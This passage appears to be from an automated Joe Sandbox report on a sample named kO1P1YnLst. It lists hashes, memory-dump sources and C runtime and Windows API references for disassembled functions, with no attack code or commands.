Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE39 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction ID: d4ebaa65498674ec5fd033f868b33b9562cf8a9fc909dcd3fe82be6bf65502bb
Opcode Fuzzy Hash: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction Fuzzy Hash: 6F321332E69F014DD7239634CC62376A259AFB73C4F55D737E81AB5AA5EB28C4C34108

Uniqueness

Uniqueness Score: -1.00%

Function 05BEC3F8 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 4a88b3fea4ceadbf219c4a1257aabac5bde4d144180df2bef0c03260f7a0713b
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 109130721090A24EDB2D863E853943EFFE2AA421A171E17DED4F3CB1C1EF14E955D620

Uniqueness

Uniqueness Score: -1.00%

Function 0040C191 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 5975a2af078c28816f01fe1301a8b7dceccd13c1e98c5dc0dc8573345ea9f6ce
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 219186722180A38AD72D437984B403FFFE15A513A131A07BFD4F2DA6C1EE38C555A628

Uniqueness

Uniqueness Score: -1.00%

Function 05BEC6B3 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 88697b433ab1543bab09012a3976ca56dab634a9f9463f81a602095865ab2108
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: F691547710D0A34ADB6D863E857443EFFE2AA421A171E07DED4F3CA1C5EF24A954D620

Uniqueness

Uniqueness Score: -1.00%

Function 0040C44C Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 21e6ce72fb18376f8c9c0177a15a08f5feb8af2f21d081aaa92a013857dedb9e
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 0F9179761080A38ADB29473985B403FFFE15A523A131A0BBFD4F2DB2C5EE38D555E624

Uniqueness

Uniqueness Score: -1.00%

Function 05BEC131 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: cd23d0ab1d98af7c0ab640751f1ad9e8707d7966d6ed83fc584e9595d9645c81
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 2C91447220D0A34ADB6D467E987443DFFE2AA421A171E07DED4F3CB1C5EF24E9649620

Uniqueness

Uniqueness Score: -1.00%

Function 0040BECA Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 69778eac300dd1c10c594cbe57f4f6eadb7335fd5fb69c830af9f3d407440417
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 3F9158722080A389D729477D897447FFFE19A513A131A07BFD4F2DB2C1EE388554DA68

Uniqueness

Uniqueness Score: -1.00%

Function 05BEBE87 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: b5ee92ad1bbb3f10d48905948e80cbc51a4753f9f8486f6e57e17ba17e759a33
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 9A81267220D0A349DB6E863E857443EFFE2BA412A171E07DED4F3CA1C6EF14E5549A60

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC20 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 2607aabaea6df519b2dd372ead2d1238015a119bad60f1980fa744d4abdc4045
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: D38186722080A34AEB294639847447FFFE1DE513A131A07BFD4F2DA2C1EF38855596AC

Uniqueness

Uniqueness Score: -1.00%

Function 042554B3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986065052.0000000004255000.00000040.00000020.00020000.00000000.sdmp, Offset: 04255000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4255000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: b4f9b8b7d6d7a8e04f0bc80a03af0beafa97f61a97f3832c5c22263952f68553
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: F5115E72360101AFD754DF55DC85FA673EAEB89360B298069ED08CB326E675F841C760

Uniqueness

Uniqueness Score: -1.00%

Function 05BE0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 68217395087db1c8abaa5bbad9d3bcce13bb0f5db10b36a60df95a3bd9a4a687
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 7C018476A006089FDB21DF24C809FBA33A5FB85315F4984F5D907D7241E7B4B9418B90

Uniqueness

Uniqueness Score: -1.00%

Function 05BF21D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05BF2241
_free.LIBCMT ref: 05BF2257
_free.LIBCMT ref: 05BF2268
_free.LIBCMT ref: 05BF2279
_free.LIBCMT ref: 05BF2290
GetCPInfo.KERNEL32(?,?), ref: 05BF22D8

Part of subcall function 05BFB3B5: _free.LIBCMT ref: 05BFB420

_free.LIBCMT ref: 05BF2484
_free.LIBCMT ref: 05BF2497
_free.LIBCMT ref: 05BF24A5
_free.LIBCMT ref: 05BF24B0
_free.LIBCMT ref: 05BF24F2
_free.LIBCMT ref: 05BF24FA
_free.LIBCMT ref: 05BF2502
_free.LIBCMT ref: 05BF250A
_free.LIBCMT ref: 05BF2518

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction ID: 46a523181f7eda93652f61746cafd6a7cc466448c6d6001ed5317ad29ff99eaf
Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction Fuzzy Hash: 88B18075E00205AFDB21DFA9CC84BEEF7F5FF08300F1440ADEA95A7241DA75A9498B60

Uniqueness

Uniqueness Score: -1.00%

Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00411FDA
_free.LIBCMT ref: 00411FF0
_free.LIBCMT ref: 00412001
_free.LIBCMT ref: 00412012
_free.LIBCMT ref: 00412029
GetCPInfo.KERNEL32(?,?), ref: 00412071

Part of subcall function 0041B14E: _free.LIBCMT ref: 0041B1B9

_free.LIBCMT ref: 0041221D
_free.LIBCMT ref: 00412230
_free.LIBCMT ref: 0041223E
_free.LIBCMT ref: 00412249
_free.LIBCMT ref: 0041228B
_free.LIBCMT ref: 00412293
_free.LIBCMT ref: 0041229B
_free.LIBCMT ref: 004122A3
_free.LIBCMT ref: 004122B1

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64

Uniqueness

Uniqueness Score: -1.00%

Function 05BFF788 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 05BFF7CC

Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEB38
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEB4A
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEB5C
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEB6E
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEB80
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEB92
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEBA4
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEBB6
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEBC8
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEBDA
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEBEC
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEBFE
Part of subcall function 05BFEB1B: _free.LIBCMT ref: 05BFEC10

_free.LIBCMT ref: 05BFF7C1

Part of subcall function 05BF6501: HeapFree.KERNEL32(00000000,00000000,?,05BFF288,?,00000000,?,00000000,?,05BFF52C,?,00000007,?,?,05BFF920,?), ref: 05BF6517
Part of subcall function 05BF6501: GetLastError.KERNEL32(?,?,05BFF288,?,00000000,?,00000000,?,05BFF52C,?,00000007,?,?,05BFF920,?,?), ref: 05BF6529

_free.LIBCMT ref: 05BFF7E3
_free.LIBCMT ref: 05BFF7F8
_free.LIBCMT ref: 05BFF803
_free.LIBCMT ref: 05BFF825
_free.LIBCMT ref: 05BFF838
_free.LIBCMT ref: 05BFF846
_free.LIBCMT ref: 05BFF851
_free.LIBCMT ref: 05BFF889
_free.LIBCMT ref: 05BFF890
_free.LIBCMT ref: 05BFF8AD
_free.LIBCMT ref: 05BFF8C5

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 86e525b4b5357eb754ab9142892163898101d1fdd67fd11d84623c4bbd595cc2
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: 20313E32A04205EFEF309E78E888B7AB7E9FF00250F1444A9EA59E7150DF31F9888711

Uniqueness

Uniqueness Score: -1.00%

Function 0041F521 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041F565

Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9

_free.LIBCMT ref: 0041F55A

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F57C
_free.LIBCMT ref: 0041F591
_free.LIBCMT ref: 0041F59C
_free.LIBCMT ref: 0041F5BE
_free.LIBCMT ref: 0041F5D1
_free.LIBCMT ref: 0041F5DF
_free.LIBCMT ref: 0041F5EA
_free.LIBCMT ref: 0041F622
_free.LIBCMT ref: 0041F629
_free.LIBCMT ref: 0041F646
_free.LIBCMT ref: 0041F65E

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9B2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E9FA
_free.LIBCMT ref: 0041EA1E
_free.LIBCMT ref: 0041EA2B
_free.LIBCMT ref: 0041EA50
_free.LIBCMT ref: 0041EA5D
_free.LIBCMT ref: 0041EA66
_free.LIBCMT ref: 0041ED44
_free.LIBCMT ref: 0041ED4C

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794

Uniqueness

Uniqueness Score: -1.00%

Function 00423226 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249

Strings

/BB, xrefs: 0042342E
sqrt, xrefs: 004233CD
acos, xrefs: 004233C1
log, xrefs: 004232EF, 004232FB
log10, xrefs: 00423293, 004232E3
pow, xrefs: 0042332D, 004233D9, 004233EC
asin, xrefs: 004233B5
exp, xrefs: 0042330E, 00423370

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: DecodePointer
String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-1021189420
Opcode ID: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
Opcode Fuzzy Hash: 630b55b5aee0cdac9947df96942a2c518d9551f2e4122bfaff5c71f9b894d309
Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D

Uniqueness

Uniqueness Score: -1.00%

Function 05BF6E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05BF6EA0

Part of subcall function 05BF6501: HeapFree.KERNEL32(00000000,00000000,?,05BFF288,?,00000000,?,00000000,?,05BFF52C,?,00000007,?,?,05BFF920,?), ref: 05BF6517
Part of subcall function 05BF6501: GetLastError.KERNEL32(?,?,05BFF288,?,00000000,?,00000000,?,05BFF52C,?,00000007,?,?,05BFF920,?,?), ref: 05BF6529

_free.LIBCMT ref: 05BF6EAC
_free.LIBCMT ref: 05BF6EB7
_free.LIBCMT ref: 05BF6EC2
_free.LIBCMT ref: 05BF6ECD
_free.LIBCMT ref: 05BF6ED8
_free.LIBCMT ref: 05BF6EE3
_free.LIBCMT ref: 05BF6EEE
_free.LIBCMT ref: 05BF6EF9
_free.LIBCMT ref: 05BF6F07

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: f9f3d96bad564426aac613357a34c8c48caef93a44b6278e5b6bbeb6c9a16998
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: 5711A276A0010DBFCF11EF99C945CD93BA5EF04354B4184A5FE089B225DA32FA589B81

Uniqueness

Uniqueness Score: -1.00%

Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416C39

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 00416C45
_free.LIBCMT ref: 00416C50
_free.LIBCMT ref: 00416C5B
_free.LIBCMT ref: 00416C66
_free.LIBCMT ref: 00416C71
_free.LIBCMT ref: 00416C7C
_free.LIBCMT ref: 00416C87
_free.LIBCMT ref: 00416C92
_free.LIBCMT ref: 00416CA0

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44

Uniqueness

Uniqueness Score: -1.00%

Function 05BE1417 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05BE141C
std::_Lockit::_Lockit.LIBCPMT ref: 05BE142E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 05BE146B

Part of subcall function 05BE80E1: _Yarn.LIBCPMT ref: 05BE8100
Part of subcall function 05BE80E1: _Yarn.LIBCPMT ref: 05BE8124

std::bad_exception::bad_exception.LIBCMT ref: 05BE148C
__CxxThrowException@8.LIBVCRUNTIME ref: 05BE149A
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 05BE14BD
std::_Lockit::~_Lockit.LIBCPMT ref: 05BE152E

Strings

n~B, xrefs: 05BE1417

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: n~B
API String ID: 835844855-2489732092
Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction ID: f048a96069191530542a20697b307b0b5cdf230396e4bebfe76b0580e28101d6
Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction Fuzzy Hash: 46319171904B40DFC731AF29D84465AFBF4FF58610B248AAFE09B92A50CB34B605CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004011B5
std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204

Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD

std::bad_exception::bad_exception.LIBCMT ref: 00401225
__CxxThrowException@8.LIBVCRUNTIME ref: 00401233
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7

Strings

bad locale name, xrefs: 0040121D

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 835844855-1405518554
Opcode ID: 63e05c14b460d685efbaffe237daf51259fe89ad88eb658e1c08f97622123781
Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
Opcode Fuzzy Hash: 63e05c14b460d685efbaffe237daf51259fe89ad88eb658e1c08f97622123781
Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 05BF9514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction ID: 745f292e5d08c7606db9af728c70d0af91863e5dbddb2f9fcba847acde184f15
Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction Fuzzy Hash: 94C1AF74A08349ABDF11DFA8D884BADBBB5FF09310F0841D5EA41AB291C730A949CB65

Uniqueness

Uniqueness Score: -1.00%

Function 05BF4CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05BF6F80: GetLastError.KERNEL32(?,?,05BEE697,?,?,?,05BEED94,?), ref: 05BF6F84
Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FB7
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FF8
Part of subcall function 05BF6F80: _abort.LIBCMT ref: 05BF6FFE

_memcmp.LIBVCRUNTIME ref: 05BF4F5B
_free.LIBCMT ref: 05BF4FCC
_free.LIBCMT ref: 05BF4FE5
_free.LIBCMT ref: 05BF5017
_free.LIBCMT ref: 05BF5020
_free.LIBCMT ref: 05BF502C

Strings

C, xrefs: 05BF4E19

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

